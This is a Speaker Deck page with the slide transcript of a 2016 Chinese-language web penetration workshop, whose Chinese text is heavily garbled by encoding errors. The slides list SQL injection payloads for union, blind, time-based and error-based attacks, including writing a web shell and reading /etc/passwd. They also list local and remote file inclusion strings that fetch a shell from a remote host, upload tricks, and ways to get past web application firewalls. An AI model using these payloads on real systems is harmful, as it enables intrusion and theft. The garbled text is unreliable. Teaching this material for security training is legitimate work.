Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web滲透技巧(下)

Avatar for Lionbug Lionbug
October 01, 2016
Research
0
740

 Web滲透技巧(下)

The Declaration of Hacker (TDOH) WorkShop

Avatar for Lionbug

Lionbug

October 01, 2016
Tweet

More Decks by Lionbug

See All by Lionbug
Privacy and Security
Avatar for Lionbug lionbug
0
250
Web滲透技巧(上)
Avatar for Lionbug lionbug
1
400

Other Decks in Research

See All in Research
20年前に50代だった人たちの今
Avatar for marimari hysmrk
0
140
生成AI による論文執筆サポート・ワークショップ 論文執筆・推敲編 / Generative AI-Assisted Paper Writing Support Workshop: Drafting and Revision Edition
Avatar for Kenji Saito ks91
PRO
0
120
A History of Approximate Nearest Neighbor Search from an Applications Perspective
Avatar for Yusuke Matsui matsui_528
1
160
社内データ分析AIエージェントを できるだけ使いやすくする工夫
Avatar for Yusuke Fukasawa fufufukakaka
1
900
超高速データサイエンス
Avatar for Yusuke Matsui matsui_528
2
380
2026.01ウェビナー資料
Avatar for Elith elith
0
220
J-RAGBench: 日本語RAGにおける Generator評価ベンチマークの構築
Avatar for Koki Itai koki_itai
0
1.3k
ウェブ・ソーシャルメディア論文読み会 第36回: The Stepwise Deception: Simulating the Evolution from True News to Fake News with LLM Agents (EMNLP, 2025)
Avatar for taichi_murayama hkefka385
0
160
第66回コンピュータビジョン勉強会@関東 Epona: Autoregressive Diffusion World Model for Autonomous Driving
Avatar for Kento Sasaki kentosasaki
0
350
2025-11-21-DA-10th-satellite
Avatar for Yuka Egusa yegusa
0
110
生成的情報検索時代におけるAI利用と認知バイアス
Avatar for Y. Yamamoto trycycle
PRO
0
290
Multi-Agent Large Language Models for Code Intelligence: Opportunities, Challenges, and Research Directions
Avatar for Fatemeh Fard (UBC) fatemeh_fard
0
120

Featured

See All Featured
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
Avatar for Dan Newman danielanewman
231
22k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
Avatar for Stéphanie Walter stephaniewalter
287
14k
Fireside Chat
Avatar for paigeccino paigeccino
41
3.8k
HDC tutorial
Avatar for Michiel Stock michielstock
1
390
We Have a Design System, Now What?
Avatar for Morgane Peng morganepeng
54
8k
エンジニアに許された特別な時間の終わり
Avatar for watany watany
106
230k
Digital Projects Gone Horribly Wrong (And the UX Pros Who Still Save the Day) - Dean Schuster
Avatar for UX Y'all uxyall
0
380
How To Speak Unicorn (iThemes Webinar)
Avatar for Michelle Schulp Hunt marktimemedia
1
380
Build your cross-platform service in a week with App Engine
Avatar for Jose L jlugia
234
18k
A Soul's Torment
Avatar for Nat Ma seathinner
5
2.3k
Being A Developer After 40
Avatar for Adrian Kosmaczewski akosma
91
590k
We Are The Robots
Avatar for Honza Javorek honzajavorek
0
160

Transcript

  1. Web佒蝚ದૣ(Ӥ) ӥ 2016/10/01 @ TDOH WorkShop LionBug

  2. About Me • 讙紣Ռ̴a.k.a̴LionBug • ಑褾ੜ୞ of TDOH • Co-founder

    of UCCU • Know a little • Web Security

  3. 蝱褩笙၏ڥአ

  4. SQL Injection

  5. SQL Injection 脒慁ৼ • Union Based • Error Based •

    Blind Based
 • Time Based

  6. SQL Injection ဳ獈֖ᗝ • WHERE id = 1 • WHERE

    id = ‘1’ • WHERE id = “1”

  7. ڣ䥁虻碘䓚ੜದૣ • MySQL物version() • MSSQL物@@version • Oracle物v$version (Table) • SQLite物sqlite_version()

  8. ଉአ޸犤 • MySQL物version()牏user()牏database() • SQLite物sqlite_version() • MSSQL物@@version牏user牏db_name()

  9. UNION Based • UNION 瞲犤ጱፓጱฎ疥獋㮆 SQL 承 ݙጱ奾ຎݳ㬫蚏㬵牐 • 䳱֖碍ᥝፘݶ

    • union select 1, 2 ,3

  10. ੜದૣ • order by 1 • order by 100 •

  11. ဳ఺Ԫ殻 • MySQL牏SQLite ᛔ㵕旉矦ࣳ眲 • MSSQL牏Orcale ࣳ眲஠殾ፘݶ • …

  12. Blind Based • 蝚螂 True ౲ False 叨ኞጱ犋ݶ奾ຎ㬵 ڣ䥁 •

    and 1=1 • and 1=0

  13. Blind Based • SELECT * FROM news WHERE id =

    1 and 
 (SELECT length(username) FROM member
 LIMIT 1)=1 • SELECT * FROM news WHERE id = 1 and 
 (SELECT length(username) FROM member
 LIMIT 1)=2

  14. Blind Based •SELECT * FROM news WHERE id = 1

    and 
 (SELECT substr(username,1,1) FROM member
 LIMIT 1)=‘a’ •SELECT * FROM news WHERE id = 1 and 
 (SELECT substr(username,1,1) FROM member
 LIMIT 1)=‘b’

  15. Time Based • 蝚螂ࢧ䛑碻樌ڣ䥁 • sleep • IF(MID(user(),1,1) = 'r',

    SLEEP(5), 0) • Heavy • BENCHMARK(100000000, rand())

  16. Error Based • 蝚螂梊藮懱௳玲஑虻碘 • ExtractValue(1,concat(0x7e,version())) • XPATH syntax error:

    ‘~5.5'

  17. SQL Injection 磧य़玕 • INTO OUTFIEL ‘/var/www/shell.php’ • LOAD_FILE(‘/etc/passwd’)

  18. PHP SQL Injection ڥአ • ଉአ螂筪獢碍 • addslashes() • mysql_escape_string()

    • mysql_real_escape_string() • magic_quotes_gpc = On • php4, php<5.2.1 磪犚㺔氂

  19. 獢碍穉斃

  20. PHP SQL Injection ڥአ • Select user From member Where

    id = 123 • 1 or 1=1 %23

  21. 䋿ֺ

  22. PHP SQL Injection ڥአ • 裾ଶ౼䥁 • ᩻螂10֖ز౼䥁 • adminxxxx’

    => adminxxxx\’
 => adminxxxx\ • where username = ‘adminxxxx\’

  23. 䲆ݷ褖ګӤ㯽

  24. 媅螂篷ဩӤ㯽.PHP • .php3 .php4 .phtml • nginx ޾ iis 蟴ᗝ梊藮

    • http://lionbug.tw/123.jpg/1.php • .htaccess

  25. Local File Inclusion ڥአ磧य़玕

  26. Local File Inclusion • include($_GET[‘file’]); • RCE • ?file=php://input •

    ?file=expect://ls • RFI • ?file=http://lionbug.tw/shell.txt

  27. Local File Inclusion • include($_GET[‘file’].’php’); • RCE • ?file=\\192.168.100.1\1.php •

    RFI • ?file=http://lionbug.tw/shell.php

  28. LFI + Upload 奲ݳದ

  29. LFI + Upload • 䲆礯犋胼ᤩ旉矦 • include.php?file=upload/123.jpg • include.php?file=../../upload/123.jpg

  30. LFI + PHPINFO 奲ݳದ

  31. LFI + PHPINFO • php upload 秚ګ • [tmp_name] =>

    /tmp/phpGvjUMn • ?file=/tmp/phpGvjUMn • 皤螛㳫ᴻ碻樌

  32. PHPINFO

  33. App ሴێਡ - ݚӞ㮆ॠ璤

  34. App 蝖ݻ • beta.lionbug.tw • 梊藮debug๚橕樂 • Facebook้粁螂᯿ᗝPINูێᏈ薹 • 战ग़WEB笙၏ๅ਻ฃڊ匍

    • 褲萢API

  35. App 蝖ݻ • ّ਻膑粚๜ • /v2/login • /v1/login <- 盛懿狒虁

    • …

  36. WAF web application firewall

  37. CloudFlare

  38. 360

  39. ਞ獊ᇸ

  40. ඊ℃

  41. WAF • DNS WAF(CloudFlare) • 戔猋ጱWAF • 敟誢ጱWAF(ਞ獊ᇸ, 360 …)

    • …

  42. 篷脲䲒介य़ဩ • 篷ࢧ䛑 • 䲒介ک硭䢗 • ᤩ旉᪡ • …

  43. Bypass WAF 媅Ջ讕媅ፗ矑಑Ԇ秚

  44. ᪡螂 DNS WAF • IP • Google • DNS history

    • 虻懱丽笙 • ูێဩ • 综膐IP • DDoS

  45. ᪡螂 DNS WAF • 獉翕硭䢗 • 礍戔๐率ࣁ獉蟂 • ڥአ笙၏ •

    SSRF(Server-side Request Forgery) • …

  46. ඊ℃

  47. Bypass WAF 蝢አ • TCP 瞥۱ • 咳᩻य़۱ • 1

    and 111…111 • ዁୵㶧捍 • य़ੜ䌃磦矦 • SeLECt 1 FroM …

  48. Bypass WAF 蝢አ • 㷢碍࿱礕 • PHP/Apache, par1=var2 • a=1&a=1

    or 1 • JSP/Tomcat, par1=var1 • ASP/IIS, par1=var1,var2 • a=1’&a=or 1—

  49. Bypass WAF 蝢አ • 承᥺粬௔ • Null Byte • a=%00’

    or ‘1 • ྋ憒蔭螈ୗ㻌ᤈ玚蟴 • /r /n • a=%0a’ or ‘1

  50. Bypass WAF 蝢አ • 翥嘨媅螂 • Urlencode • Unicode •

    Ӿ෈翥嘨

  51. Ӿ෈ਁ媅螂 Web Hacking Ӿጱ॰ದ窸ૣ Orange http://hitcon.org/2015/CMT/download/day1-c-r0.pdf

  52. MySQL Bypass WAF

  53. MySQL Bypass WAF • 绚ጮ磦矦 • select%0auser%0dfrom%09member • select(user)from(member) •

    select+user+from+member

  54. MySQL Bypass WAF • 戢薹 • select/**/user/**/from/**/member • /*!5000select 1*/

    • admin where id=1`xxxx

  55. MySQL Bypass WAF • 磦矦 • CONCAT -> CONCAT_WS •

    ‘/etc/passwd' ->
 0x2f6574632f706173737764 • 1=1 -> 1>0 • 1=1 -> 1

  56. Upload Bypass WAF

  57. 㷢碍࿱礕(1)

  58. 㷢碍࿱礕(2)

  59. ዁୵㶧捍(1)

  60. Upload Bypass WAF • ዁୵㶧捍(2) • filename=123.php • filename=‘123.php’ •

    filename=“123.jpg • 犋ݶContent-Type • application/x-www-form-urlencoded • multipart/form-data

  61. Upload Bypass WAF • ीے篷఺嬝獉਻ • a=य़䲆礯, file=123.php

  62. Other Bypass WAF

  63. Other Bypass WAF • LFI • ../../ • .//../././../

  64. 篷አੜದ胼 • User-Agent: sqlmap • ֦䨝咳匍盄ग़翕ᒊӤ犋݄ XDD

  65. Q & A